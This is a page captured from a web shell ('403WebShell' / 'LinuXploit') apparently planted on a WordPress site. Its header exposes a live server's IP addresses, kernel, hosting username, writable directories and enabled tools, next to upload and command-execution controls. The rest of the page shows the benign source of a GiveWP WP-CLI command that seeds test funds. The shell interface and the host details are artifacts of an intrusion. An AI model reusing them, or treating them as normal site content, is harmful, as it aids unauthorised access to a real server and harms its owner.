Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.137.176.238
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/wp-content/plugins/give/src/TestData/Addons/Funds/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/wp-content/plugins/give/src/TestData/Addons/Funds/FundCommand.php
<?php

namespace Give\TestData\Addons\Funds;

use Exception;
use WP_CLI;

/**
 * Class FundCommand
 * @package Give\TestData\Funds
 *
 * A WP-CLI command for seeding funds.
 */
class FundCommand
{
    /**
     * @var FundFactory
     */
    private $fundFactory;
    /**
     * @var FundRepository
     */
    private $fundsRepository;

    /**
     * @param FundFactory    $fundFactory
     * @param FundRepository $fundsRepository
     */
    public function __construct(FundFactory $fundFactory, FundRepository $fundsRepository)
    {
        $this->fundFactory = $fundFactory;
        $this->fundsRepository = $fundsRepository;
    }

    /**
     * Generates Funds
     *
     * ## OPTIONS
     * [--count=<count>]
     * : Number of funds to generate
     * default: 5
     *
     * [--preview=<preview>]
     * : Preview generated data
     * default: false
     *
     * [--consistent=<consistent>]
     * : Generate consistent data
     * default: false
     *
     * ## EXAMPLES
     *
     *     wp give test-funds --count=5 --preview=true
     *
     * @when after_wp_load
     */
    public function __invoke($args, $assocArgs)
    {
        global $wpdb;
        // Get CLI args
        $count = WP_CLI\Utils\get_flag_value($assocArgs, 'count', $default = 5);
        $preview = WP_CLI\Utils\get_flag_value($assocArgs, 'preview', $default = false);
        $consistent = WP_CLI\Utils\get_flag_value($assocArgs, 'consistent', $default = null);

        $funds = $this->fundFactory->consistent($consistent)->make($count);

        if ($preview) {
            WP_CLI\Utils\format_items(
                'table',
                $funds,
                array_keys($this->fundFactory->definition())
            );
        } else {
            $progress = WP_CLI\Utils\make_progress_bar('Generating funds', $count);

            try {
                foreach ($funds as $fund) {
                    $this->fundsRepository->insertFund($fund);
                    $progress->tick();
                }

                $wpdb->query('COMMIT');

                $progress->finish();
            } catch (Exception $e) {
                $wpdb->query('ROLLBACK');

                WP_CLI::error($e->getMessage());
            }
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit